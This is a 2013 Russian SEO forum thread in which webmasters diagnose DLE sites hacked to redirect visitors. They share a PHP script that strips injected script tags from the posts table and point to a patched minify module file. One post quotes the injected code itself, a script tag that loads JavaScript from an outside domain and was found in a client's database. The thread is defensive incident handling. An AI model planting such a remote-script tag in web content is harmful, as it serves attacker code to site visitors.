Взлом DLE - SEO форум MaulTalk.com

Сообщение сайта

(Сообщение закроется через 3 секунды)

Здравствуйте, гость (

| Вход | Регистрация )

SEO форум MaulTalk.com > Веб-строительство > Программная часть

4 страниц

1 2 3 4 >

Взлом DLE

Опции

GET_ini

Topic Starter

15.9.2013, 23:42; Ответить: GET_ini

Сообщение #1

Участник

Группа: User
Сообщений: 223
Регистрация: 6.11.2012
Из: Украина
Поблагодарили: 33 раза
Репутация:

Доброй ночи! Сегодня по ЯВ увидел предупреждение про вредоносный код на 3 сайтах. Все DLE. Захожу на них, делаю клик мышкой - редирикт на сайт другой.

Вот пациент http://vkgraffiti.ru/

Вопрос такой: кого-то взламывали так же? Где копать? В JS или где-то в другом месте? Шаблон чист. DLE обновил - но это не помогло...

Ответить с цитированием данного сообщения

install install 15.9.2013, 23:46; Сообщений: 3530 Поблагодарили: 1377 раз Репутация: 201 Просмотр профиля	15.9.2013, 23:46; Ответить: install Сообщение #2
Яндекс ЛОХ Группа: Active User Сообщений: 3530 Регистрация: 28.5.2009 Из: Нижневартовска Поблагодарили: 1377 раз Репутация: 201	GET_ini, в БД скрипты левые посмотрите в поиске ищите script, если есть, то туда залили точно в БД сидит создайте php файл, залейте в корень сайта и выполните его. БД почистится, но нужно искать дыру, снова закинут его. Развернуть/Свернуть <?php if(isset($_GET['blank'])) die(); error_reporting(0); set_time_limit(0); function stripslashes_array($array) { return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array); } if(get_magic_quotes_gpc()) $_POST = stripslashes_array($_POST); session_start (); define ( 'DATALIFEENGINE', true ); $member_id = FALSE; $is_logged = FALSE; define('ROOT_DIR', dirname( __FILE__ )); define('ENGINE_DIR', ROOT_DIR.'/engine'); require_once ROOT_DIR.'/engine/init.php'; ?> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=windows-1251" /> <title>Доктор DLE от SEO-KinG.RU</title> <style type="text/css"> body, td, th { color: #333; font-family: Arial; font-size: 14px; } </style> </head> <body> <?php if(isset($_POST['submit'])) { echo '<div id="result">'; $posts = $db->query("SELECT `id`, `full_story`, `short_story` FROM `".PREFIX."_post`"); while($post = $db->get_row($posts)) { $post['full_story'] = preg_replace('/(<script.<\/script>)/Usi', '', $post['full_story']); $post['short_story'] = preg_replace('/(<script.<\/script>)/Usi', '', $post['short_story']); $sql = 'UPDATE `'.PREFIX.'_post` SET `full_story`="'.mysql_escape_string($post['full_story']).'", `short_story`="'.mysql_escape_string($post['short_story']).'" WHERE `id`='.$post['id']; $db->query($sql); } echo 'Готово'; echo '</div>'; } ?> <form action="" method="post"> <input type="submit" name="submit" value="Начать" /> </form> </body> </html> Сообщение отредактировал install - 15.9.2013, 23:52 -------------------- Качественные и надежные VPS/VDS серверы по приятным ценам Тизеры, банеры, контекст и другие плюшки! Поблагодарили: (2) GET_ini, Reader

DukeNukem DukeNukem 15.9.2013, 23:50; Сообщений: 642 Поблагодарили: 243 раза Репутация: 41 Просмотр профиля	15.9.2013, 23:50; Ответить: DukeNukem Сообщение #3
DNSTUFF Группа: Active User Сообщений: 642 Регистрация: 7.10.2010 Из: Украина. Запорожье Поблагодарили: 243 раза Репутация: 41	<script async="async" type="text/javascript" src="http://google-webmaster.ru/767c23430487b6c64d45b83d5d32e9a1.js"></script> Вот вредоносный код, на сайте клиента был в базе данных -------------------- Решение проблем с DLE, Wordpress, Drupal 7 и многое другое

install install 15.9.2013, 23:55; Сообщений: 3530 Поблагодарили: 1377 раз Репутация: 201 Просмотр профиля	15.9.2013, 23:55; Ответить: install Сообщение #4
Яндекс ЛОХ Группа: Active User Сообщений: 3530 Регистрация: 28.5.2009 Из: Нижневартовска Поблагодарили: 1377 раз Репутация: 201	DukeNukem, еще может быть yandex-webmaster GET_ini, если не поможет, замените script на object в файлике. (GET_ini @ 16.9.2013, 1:42) DLE обновил я с утра тоже почистил один сайт БД, обновил двиг. Сижу целый день наблюдаю за ним, обратной вставки пока не было. Сообщение отредактировал install - 15.9.2013, 23:58 -------------------- Качественные и надежные VPS/VDS серверы по приятным ценам Тизеры, банеры, контекст и другие плюшки!

Belos Belos 16.9.2013, 12:38; Сообщений: 2484 Поблагодарили: 714 раз Репутация: 96 Просмотр профиля	16.9.2013, 12:38; Ответить: Belos Сообщение #5
Старожил Группа: Active User Сообщений: 2484 Регистрация: 11.11.2008 Из: Украина Поблагодарили: 714 раз Репутация: 96	Аналогичная ситуация и у меня на одном сайте. Кто-то нашел где эта бяка находится?

install install 16.9.2013, 12:50; Сообщений: 3530 Поблагодарили: 1377 раз Репутация: 201 Просмотр профиля	16.9.2013, 12:50; Ответить: install Сообщение #6
Яндекс ЛОХ Группа: Active User Сообщений: 3530 Регистрация: 28.5.2009 Из: Нижневартовска Поблагодарили: 1377 раз Репутация: 201	Belos, замените файл с дистрибутива /engine/classes/min/index.php http://dle-news.ru/bags/v10/1580-potencial...ule-minify.html а то руками прописывал, не помогло, а в дистрибе там этот код не сверху а чуть ниже прописан. ну и перед тем как менять будете, в папке engine/cache/system почистите всю лабуду-буду вчера менял на нескольких сайтах, пока не достают. -------------------- Качественные и надежные VPS/VDS серверы по приятным ценам Тизеры, банеры, контекст и другие плюшки! Поблагодарили: (1) Belos

AMILO AMILO 18.9.2013, 0:43; Сообщений: 69 Поблагодарили: 2 раза Репутация: 0 Просмотр профиля	18.9.2013, 0:43; Ответить: AMILO Сообщение #7
Частый гость Группа: User Сообщений: 69 Регистрация: 12.4.2011 Поблагодарили: 2 раза Репутация: 0	(install @ 16.9.2013, 12:50) а то руками прописывал, не помогло, а в дистрибе там этот код не сверху а чуть ниже прописан. ну и перед тем как менять будете, в папке engine/cache/system почистите всю лабуду-буду вчера менял на нескольких сайтах, пока не достают. А можете скинуть Ваш файл /engine/classes/min/index.php??? А как базу очистили? Вручную удаляли каждый скрипт или есть какой-то "быстрый" способ?! -------------------- Лучший хостинг, uptime всегда 100%, немецкие сервера по очень выгодным ценам: регистрация

Schmied Schmied 18.9.2013, 15:12; Сообщений: 460 Поблагодарили: 87 раз Репутация: 11 Просмотр профиля	18.9.2013, 15:12; Ответить: Schmied Сообщение #8
Бывалый Группа: User Сообщений: 460 Регистрация: 17.2.2010 Из: UA Поблагодарили: 87 раз Репутация: 11	(AMILO @ 18.9.2013, 0:43) А как базу очистили? Вручную удаляли каждый скрипт или есть какой-то "быстрый" способ?! я нашёл отличный скрипт в инете для массовой чистки базы. сделал два варианта - для внедрений типа script и для object заливаете в корень сайта - запускаете, нажимаете кнопочку и всё - новости чистые. а вот статические не получается скриптом, но их обычно немного, можно и руками почистить. прикладываю сами файлы - пользуемся скачать с яндекс Сообщение отредактировал Schmied - 18.9.2013, 15:12

Belos Belos 18.9.2013, 15:16; Сообщений: 2484 Поблагодарили: 714 раз Репутация: 96 Просмотр профиля	18.9.2013, 15:16; Ответить: Belos Сообщение #9
Старожил Группа: Active User Сообщений: 2484 Регистрация: 11.11.2008 Из: Украина Поблагодарили: 714 раз Репутация: 96	А тут что, трудно посмотреть скрипт чистки БД?

Schmied Schmied 18.9.2013, 16:04; Сообщений: 460 Поблагодарили: 87 раз Репутация: 11 Просмотр профиля	18.9.2013, 16:04; Ответить: Schmied Сообщение #10
Бывалый Группа: User Сообщений: 460 Регистрация: 17.2.2010 Из: UA Поблагодарили: 87 раз Репутация: 11	Belos, да, согласен. проглядел. это то же самое ну ничего, пусть будут и уже готовые файлы... (AMILO @ 17.9.2013, 23:43) А можете скинуть Ваш файл /engine/classes/min/index.php??? присоединяюсь к просьбе, я тоже руками прописывал. интересно глянуть, в чём отличие нового файла от старого. может ещё что-то прописали разрабы, а в теме багфикса этого не указали...? Сообщение отредактировал Schmied - 18.9.2013, 15:27

« Предыдущая тема · Программная часть · Следующая тема »

4 страниц

1 2 3 4 >

2 чел. читают эту тему (гостей: 2, скрытых пользователей: 0)

Пользователей: 0

Похожие темы

Тема	Ответов	Автор	Просмотров	Последний ответ
DLE xProtect	2	xoopw	5988	15.1.2024, 21:06 автор: Diana_Wesley
Обновить сайт на CMS DLE	1	Sawich	1670	2.9.2023, 10:10 автор: WoWeb
Изготовление красивых сайтов на DLE под ключ \| Доступные цены от 2000 руб.	1	Admiral_ukr	1602	20.11.2022, 10:08 автор: Webmaster24
Ищу спеца по DLE вылечить сайт	4	Reactive	2644	22.10.2022, 9:01 автор: Fozik77
требуется перенос с Dle на wordpres нужен человек для переноса движка	5	Юрий82	1950	30.7.2022, 18:02 автор: Klerik84

Режим отображения: Стандартный · Переключить на: Линейный · Переключить на: Древовидный

Подписка на тему · Сообщить другу · Версия для печати · Подписка на этот форум

Текстовая версия

Сейчас: 25.4.2024, 13:09

Дизайн